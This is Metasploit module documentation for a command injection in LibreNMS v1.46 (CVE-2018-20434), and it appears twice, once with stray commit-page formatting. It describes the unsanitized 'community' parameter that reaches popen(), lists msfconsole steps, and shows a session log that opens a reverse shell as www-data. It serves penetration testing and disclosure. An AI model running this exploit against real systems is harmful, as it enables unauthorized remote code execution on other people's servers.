documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md

## Description
  
  In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
  The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
  a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
  and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
  is passed to the `popen()` function, which results in execution of arbitrary code.

  This module has been tested on LibreNMS `v1.46` and `v1.45`.

## Vulnerable Application

  A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.

  Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
  In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
  4. Do: ```set RHOSTS <ip>```
  5. Do: ```set USERNAME <user>```
  6. Do: ```set PASSWORD <pass>```
  7. Do: ```run```
  8. You should get a shell.

## Scenarios

### Tested on LibreNMS 1.46 on Ubuntu 18.04

  ```
  msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
  rhosts => 192.168.37.143
  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
  username => blah
  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
  password => password
  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run

  [*] Started reverse TCP double handler on 192.168.37.1:4444 
  [*] Successfully logged into LibreNMS
  [+] Successfully added device with hostname dFEzcH
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [+] Successfully deleted device with hostname dFEzcH and id #126
  [*] Command: echo 38eJIFZsiRl3Er48;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket A
  [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
  [*] Matching...
  [*] B is input...
  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500

  whoami
  www-data
  uname -a
  Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
  ```
Land #11895 , CVE-2018-20434 LibreNMS cmd injection exploit 2019-06-04 12:28:24 -05:00			`## Description`

			In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
			The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
			a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
			and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
			is passed to the `popen()` function, which results in execution of arbitrary code.

			This module has been tested on LibreNMS `v1.46` and `v1.45`.

			`## Vulnerable Application`

			`A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.`

			`Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).`
			In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
			4. Do: ```set RHOSTS <ip>```
			5. Do: ```set USERNAME <user>```
			6. Do: ```set PASSWORD <pass>```
			7. Do: ```run```
			`8. You should get a shell.`

			`## Scenarios`

			`### Tested on LibreNMS 1.46 on Ubuntu 18.04`

			```
			`msf5 > use exploit/linux/http/librenms_addhost_cmd_inject`
			`msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143`
			`rhosts => 192.168.37.143`
			`msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah`
			`username => blah`
			`msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password`
			`password => password`
			`msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1`
			`lhost => 192.168.37.1`
			`msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run`

			`[*] Started reverse TCP double handler on 192.168.37.1:4444`
			`[*] Successfully logged into LibreNMS`
			`[+] Successfully added device with hostname dFEzcH`
			`[*] Accepted the first client connection...`
			`[*] Accepted the second client connection...`
			`[+] Successfully deleted device with hostname dFEzcH and id #126`
			`[*] Command: echo 38eJIFZsiRl3Er48;`
			`[*] Writing to socket A`
			`[*] Writing to socket B`
			`[*] Reading from sockets...`
			`[*] Reading from socket A`
			`[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"`
			`[*] Matching...`
			`[*] B is input...`
			`[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500`

			`whoami`
			`www-data`
			`uname -a`
			`Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux`
			```